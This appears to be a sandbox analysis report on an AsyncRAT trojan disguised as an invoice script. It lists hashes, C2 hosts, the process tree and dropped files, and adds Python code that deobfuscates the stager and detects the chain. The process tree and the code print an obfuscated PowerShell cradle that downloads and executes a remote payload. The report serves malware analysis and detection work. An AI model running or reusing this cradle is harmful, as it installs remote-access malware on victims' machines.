Analysis

  • max time kernel
    148s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/11/2023, 17:36

General

  • Target

    16112023_0136_15112023_Invoice#2356876431.wsf

  • Size

    21KB

  • MD5

    5d9bc7257648e766a56fa284fc93eb54

  • SHA1

    5ec96df82f7290ef18b15ce048e2f0cf49af523b

  • SHA256

    ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292

  • SHA512

    ada4abe483fb6df5422fb96f615e6fc67f08939d3d89a6ff2ad7b3f6e291a613789aa4b89925bbe9c450ba07b5f746dbe62b36cd25c3b28468c41d88fe9f1e06

  • SSDEEP

    384:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaaaaaal0/OlaaaaaaaaaaaJaaaaaaaaaa9:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaF

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Sended@

C2

hexrxr.duckdns.org:6606

hexrxr.duckdns.org:7707

hexrxr.duckdns.org:8808

Mutex

AsyncMutex_85&$nkeo4%hifbe

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
      PID:4928
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k UnistackSvcGroup
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4584
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3984
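
The stager that WScript.exe (PID 2500) hands to powershell.exe (PID 4292) hides its download cradle by splitting `IEX(New-Object Net.WebClient).DownloadString(...)` across three variables, mangling letter case, abbreviating the switches, and splicing the missing `ADSTRING` back in with `.Replace()`. The block below is an added example of statically recovering that command line without executing it; it is not part of the sandbox report. It evaluates only the subset the sample uses (assignments of single-quoted literals, chained `.Replace()`, `+` concatenation into `IEX`) and expands the abbreviated switches against a short parameter list that I supply as an assumption.

```python
"""Static recovery of the obfuscated PowerShell stager seen under PID 4292 (added example)."""
import re
from typing import Dict, List

# Constructed copy of the argument string recorded for PID 4292 in the report above.
STAGER_ARGS = (
    "-NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];"
    "$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];"
    "$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');"
    "[BYTe[]];IeX($A123+$B456+$C789)"
)

LITERAL = r"'((?:[^']|'')*)'"  # single-quoted PowerShell string; '' is an escaped quote
ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.+)$", re.S)
REPLACE_RE = re.compile(r"\.replace\(\s*" + LITERAL + r"\s*,\s*" + LITERAL + r"\s*\)", re.I)
IEX_RE = re.compile(r"^(?:iex|invoke-expression)\s*\((.+)\)$", re.I | re.S)
TYPE_NOOP = re.compile(r"\[\w+(?:\[\])?\]")  # a bare type literal such as [BYTe[]] does nothing
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

# Assumption: a short list of powershell.exe parameters, used to expand the abbreviated
# switches (PowerShell accepts any unambiguous prefix of a parameter name).
PS_PARAMS = ["-NoProfile", "-NonInteractive", "-NoLogo", "-NoExit", "-WindowStyle",
             "-ExecutionPolicy", "-EncodedCommand", "-Command", "-File"]


def split_top(s: str, sep: str) -> List[str]:
    """Split on sep, ignoring occurrences inside single quotes or parentheses."""
    out, buf, depth, in_q, i = [], [], 0, False, 0
    while i < len(s):
        ch = s[i]
        if in_q and ch == "'" and s[i + 1:i + 2] == "'":  # escaped quote, keep both chars
            buf.append("''")
            i += 2
            continue
        if ch == "'":
            in_q = not in_q
        elif not in_q and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not in_q and ch == sep and depth == 0:
            out.append("".join(buf))
            buf = []
            i += 1
            continue
        buf.append(ch)
        i += 1
    out.append("".join(buf))
    return out


def unquote(lit: str) -> str:
    return lit.replace("''", "'")


def eval_term(term: str, env: Dict[str, str]) -> str:
    """A term is a literal or $variable, optionally followed by chained .Replace() calls."""
    term = term.strip()
    m = re.match(LITERAL, term)
    if m:
        value = unquote(m.group(1))
    else:
        m = re.match(r"\$(\w+)", term)
        if not m:
            raise ValueError(f"unsupported term: {term!r}")
        value = env[m.group(1)]
    rest = term[m.end():]
    if REPLACE_RE.sub("", rest).strip():
        raise ValueError(f"unsupported method chain: {rest!r}")
    for old, new in REPLACE_RE.findall(rest):  # textual order is evaluation order
        value = value.replace(unquote(old), unquote(new))  # .Replace() is case-sensitive
    return value


def eval_expr(expr: str, env: Dict[str, str]) -> str:
    return "".join(eval_term(t, env) for t in split_top(expr, "+"))


def expand_switches(tokens: List[str]) -> List[str]:
    out = []
    for tok in tokens:
        if tok.startswith("-"):
            hits = [p for p in PS_PARAMS if p.lower().startswith(tok.lower())]
            tok = hits[0] if len(hits) == 1 else tok  # leave ambiguous/unknown ones as-is
        out.append(tok)
    return out


def deobfuscate(args: str) -> Dict[str, object]:
    env: Dict[str, str] = {}
    switches: List[str] = []
    command = None
    for stmt in split_top(args, ";"):
        stmt = TYPE_NOOP.sub("", stmt).strip()
        if not stmt:
            continue
        if stmt.startswith("-"):
            switches = expand_switches(stmt.split())
        elif ASSIGN_RE.match(stmt):
            m = ASSIGN_RE.match(stmt)
            env[m.group(1)] = eval_expr(m.group(2), env)
        elif IEX_RE.match(stmt):
            command = eval_expr(IEX_RE.match(stmt).group(1), env)
        else:
            raise ValueError(f"unsupported statement: {stmt!r}")
    return {"switches": switches, "variables": env, "command": command,
            "urls": URL_RE.findall(command or "")}


if __name__ == "__main__":
    result = deobfuscate(STAGER_ARGS)
    print(" ".join(result["switches"]), "|", result["command"], "|", result["urls"])
```

Two things in the output matter for detection content: the switches resolve to `-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -NonInteractive`, and the literal `DownloadString` never appears on the command line, because the sample carries `DOWNLO` and `ADSTRING` separately. Rules that key on the recovered command (or on `IEX` over concatenated variables) will hold up where a plain `WebClient`/`DownloadString` string match does not.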

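Process-creation telemetry alone, before any deobfuscation, already separates this chain from normal activity. The block below is an added example (mine, not the report's or the sandbox vendor's) that encodes the relations visible in the tree above as rules over constructed process-creation events mirroring it: WScript.exe spawning powershell.exe; hidden-window and bypass switches in their abbreviated forms; `IEX` over concatenated variables; scripts staged under C:\Users\Public; and a .NET utility (RegSvcs.exe here) launched by PowerShell with no arguments, which is the shape of the SetThreadContext hollowing the report flags on PID 1976. The parent links, and the RegAsm/InstallUtil/MSBuild entries in the hollow-host list, are assumptions not stated in the report.

```python
"""Process-tree detection rules modelled on the chain in the report above (added example)."""
import re
from typing import Dict, List, Optional

# Constructed process-creation events mirroring the "Processes" section. ppid is None
# where the report shows a top-level (depth 1) process; the parent links are assumptions.
EVENTS = [
    {"pid": 2500, "ppid": None, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"'},
    {"pid": 4292, "ppid": 2500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                 r"-NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';"
                 r"$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'"
                 r".RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)")},
    {"pid": 4928, "ppid": None, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r'"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe'},
    {"pid": 4584, "ppid": None, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k UnistackSvcGroup"},
    {"pid": 3400, "ppid": None, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"'},
    {"pid": 1624, "ppid": 3400, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "'},
    {"pid": 1976, "ppid": 1624, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"'''},
    {"pid": 3984, "ppid": 1976, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = SCRIPT_HOSTS | {"powershell.exe", "cmd.exe"}
# RegSvcs.exe is the host the report shows; the others are added as common
# no-argument hollowing targets (assumption, not from the report).
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def cmd_args(cmdline: str) -> str:
    """Everything after the (possibly quoted) image token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    return cmdline.split(None, 1)[1].strip() if " " in cmdline else ""


def rules_for(ev: dict, parent: Optional[dict]) -> List[str]:
    img, cmd = basename(ev["image"]), ev["cmdline"]
    pimg = basename(parent["image"]) if parent else ""
    hits: List[str] = []
    if img == "powershell.exe":
        if pimg in SCRIPT_HOSTS:
            hits.append("script-host-spawns-powershell")
        # powershell.exe accepts any unambiguous prefix of a parameter name, so
        # "-WIND HIDDeN" and "-eXeC BYPASS" are as good as the full spellings.
        hidden = re.search(r"-w\w*\s+hidden\b", cmd, re.I)
        bypass = re.search(r"-e\w*\s+bypass\b", cmd, re.I)
        if hidden and bypass:
            hits.append("powershell-hidden-bypass")
        # IEX over concatenated variables: the cradle text itself is split across
        # them, so a literal search for WebClient/DownloadString misses this sample.
        if re.search(r"(?:iex|invoke-expression)\s*\(\s*\$\w+\s*\+", cmd, re.I):
            hits.append("iex-of-concatenated-variables")
    if re.search(r"\\users\\public\\", cmd, re.I):
        hits.append("public-dir-staging")
    if img in HOLLOW_HOSTS and pimg in INTERPRETERS and not cmd_args(cmd):
        hits.append("dotnet-host-launched-without-args")
    return hits


def detect(events: List[dict]) -> Dict[int, List[str]]:
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: rules_for(e, by_pid.get(e["ppid"])) for e in events}


def ancestry(events: List[dict], pid: int) -> List[str]:
    """Image names from pid up to the root the events know about."""
    by_pid = {e["pid"]: e for e in events}
    chain: List[str] = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for pid, hits in detect(EVENTS).items():
        if hits:
            print(pid, " <- ".join(ancestry(EVENTS, pid)), hits)
```

Run against the constructed events, the rundll32.exe and svchost.exe entries produce no hits, the two PowerShell instances and the C:\Users\Public scripts each trip at least one rule, and RegSvcs.exe with an empty argument list under powershell.exe is the single highest-value signal: a .NET utility that exists to register assemblies has no reason to start with nothing to register.
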
    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            026d93a446c50e4ae9aa47a15d0e923f

            SHA1

            f8832c1a57c63bc1b085b10f39b69254e27b2fb8

            SHA256

            c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089

            SHA512

            009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_japlqqsa.qnw.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Public\Conted.bat

            Filesize

            205B

            MD5

            759278dd3dc3679bf7efd1ec681c0aa1

            SHA1

            72b37494696deea940ac75b4c4e06e2b6ce419ef

            SHA256

            cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19

            SHA512

            8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

          • C:\Users\Public\Conted.ps1

            Filesize

            422KB

            MD5

            ba03b4e7a4ad2bd4a2f5bce388d8f489

            SHA1

            f71681ee8115d4349084ad5c26e790a926bbea84

            SHA256

            d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a

            SHA512

            6dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665

          • C:\Users\Public\Conted.vbs

            Filesize

            688B

            MD5

            110da9d3474ba64fa1a18c173685c25d

            SHA1

            9f093829518a9268bf9807fda7bef47e7832c497

            SHA256

            a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60

            SHA512

            ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

          • memory/1976-79-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1976-76-0x000001EC79C70000-0x000001EC79C8A000-memory.dmp

            Filesize

            104KB

          • memory/1976-63-0x000001EC5F8D0000-0x000001EC5F8E0000-memory.dmp

            Filesize

            64KB

          • memory/1976-62-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

            Filesize

            10.8MB

          • memory/3984-80-0x0000000075020000-0x00000000757D0000-memory.dmp

            Filesize

            7.7MB

          • memory/3984-82-0x0000000005C90000-0x0000000006234000-memory.dmp

            Filesize

            5.6MB

          • memory/3984-86-0x0000000006380000-0x00000000063E6000-memory.dmp

            Filesize

            408KB

          • memory/3984-85-0x0000000005BE0000-0x0000000005C7C000-memory.dmp

            Filesize

            624KB

          • memory/3984-84-0x0000000005810000-0x000000000581A000-memory.dmp

            Filesize

            40KB

          • memory/3984-83-0x0000000005880000-0x0000000005912000-memory.dmp

            Filesize

            584KB

          • memory/3984-81-0x00000000054D0000-0x00000000054E0000-memory.dmp

            Filesize

            64KB

          • memory/3984-77-0x0000000000400000-0x0000000000416000-memory.dmp

            Filesize

            88KB

          • memory/4292-14-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

            Filesize

            64KB

          • memory/4292-15-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

            Filesize

            64KB

          • memory/4292-13-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

            Filesize

            10.8MB

          • memory/4292-3-0x0000024E33070000-0x0000024E33092000-memory.dmp

            Filesize

            136KB

          • memory/4292-21-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

            Filesize

            10.8MB

          • memory/4584-58-0x000002A3D9FA0000-0x000002A3D9FA1000-memory.dmp

            Filesize

            4KB

          • memory/4584-38-0x000002A3D1B40000-0x000002A3D1B50000-memory.dmp

            Filesize

            64KB

          • memory/4584-54-0x000002A3D9E60000-0x000002A3D9E61000-memory.dmp

            Filesize

            4KB

          • memory/4584-56-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

            Filesize

            4KB

          • memory/4584-57-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

            Filesize

            4KB